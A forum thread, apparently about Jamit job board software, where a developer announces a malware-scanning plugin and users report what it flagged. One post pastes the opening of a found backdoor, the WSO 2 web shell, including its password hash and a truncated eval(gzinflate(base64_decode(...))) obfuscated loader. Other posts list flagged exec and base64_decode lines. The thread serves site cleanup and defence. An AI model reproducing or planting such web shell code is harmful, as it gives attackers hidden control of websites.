Security Tools Plugin

[Adam]

Just released the security tools plugin today. Available to download from http://www.jamit.com/plugins/SecurityTools.zip

Description: Recently, there has been an alarming increase in the number
of websites infected with malware. Your computer can be infected in seconds
just by visiting a malware infected site - even if you
have the latest anti-virus and upgrades installed.
A site infected with malware is then used to infect your site's visitors.
Once the malware is present on a desktop machine, it is able to steal FTP
passwords / login details and use these details to gain unauthorized access
to infect more sites.

This plugin scans your job board installation, and attempts
to hunt down the infections based on a few common signatures that we found
from analyzing a number of infected sites. The plugin scans PHP files
to find any unusual PHP code, and it is also able to scan some of the job
board's directories to hunt for files out of place.

Be aware, the scanner may report some false-positives.

Available to download from http://www.jamit.com/plugins/SecurityTools.zip

See README.txt for installation details.

[dotmagic]

Excellent plugin.

Nice to see Jamit take more step towards security features of the script and the site.

I have installed it and tested it. Works great.

Thanks to Adam.

Thanks,
BV.

[CompuDave]

Thanks for this. I have just completed installing and running the Security Tools Plugin. Seems to work very well and is very easy to use.

Firstly, a suggestion. Would it be possible to exclude certain folders when performing a scan? My initial scan returned a lot of "results" which were all related to other folders (ie openx, forum, etc).

Scan returned all non job board results.

Hunt returned one issue namely: 9340_tatto1247227692.mp3
However, when trying to locate this file, it is not visible from within my ftp client. The file is meant to be located in the "upload_files/docs" folder but all files in this folder start with 1, 2, 3 or 4.

[rutulo]

I find I file with SCAN file: wso22.php

content is:
<?php
/**
 * WSO 2
 * Web Shell by oRb
 */
$auth = array(
   'md5pass' => "63a9f0ea7bb98050796b649e85481845" // root
);
$color = "#df5";
@define('SELF_PATH', __FILE__);
eval(gzinflate(base64_decode('7X1rV9tKsuhnzlrnP3Q0nC17xxjbQCYxGMIbEkIIj5AHuRxZkm0F2dKWZAzJ8N9vVfVDLVk2Jtln7r1r3Zm1g9VdXV39qq6urqr2OiUWJ1EYxKX567Pd04+7p1/Ng/Pzk+sL+Lre3N89Pje/Vcz9IOj6rllmz1ot1rH82GVl9vM//2Ou51qOG5WozGK9WmPLtWV2HCRsLxgOHLO8CjDunZfA34f.....

was in public_html directory and when I open on the browser, jus ask for a password. Now I delated.

[Peter]

Rutulo,

That's definitely malicious code. I admire you that you dared to view it in your browser.

[Amjad]

Hi,
First thank you for this much needed security tool.....

I installed it and run it on my JB and i got the following warning message

Possibly bad code (execution of a shell command) /public_html/include/edit_config.php on line 909:
@exec ("w", $out);

any suggestions?

Regards,
Amjad

[Adam]

wso22.php - definitely a back-door & should be deleted.
Mp3 files should be safe - its a bug that the plugin flags them, it will be fixed for the next revision.
@exec ("w", $out); - it is totally safe, I'll put on the white list for the next version.
Thanks for reporting!

[Adam]

Amjad - your edit_config.php file is in the wrong directory, it should not be in include/ but in admin/, please delete it from include/

[Amjad]

Done
Thnx Adam

[promotionbox.de]

Ok security tool works fine, nothing unsual code found. How often I must run the scan?

Thanks
-Thorsten

[abhishek1711]

guys this scares me - it shows 167 threats on my job board MbaNaukri.com - (users have sometimes complained when they try to visit site it says like "Urgent notice your website MBA naukri has been infected with trojan Virus. People having Kaspersky installed in their system cannot search your website after initial login")

have attached the results given by the plugin, plz help

[Banenpak]

Thanks Adam!

[Philcol]

Found a file:  class.php
line 36: 
$mess64 = base64_decode($_POST['message']);

Another:

adw.php
line 40: $mess64 = base64_decode($_POST['message']);

Delete?

[Philcol]

Found another:

edit_config.php on line 909:
@exec ("w", $out);

Advice on this one? 

[Philcol]

Found these on yet another domain:

include/functions2.php on line 231:
$make_magick = exec($command, $retval);

include/functions2.php on line 1701:
exec ("w", $out);

include/edit_config.php on line 909:
@exec ("w", $out);

cache/cat_f4_c0_cache.inc.php on line 2:
$category_table = unserialize('a:2:{s:2:"EN";a:3:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}s:2:"ES";a:3:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}}');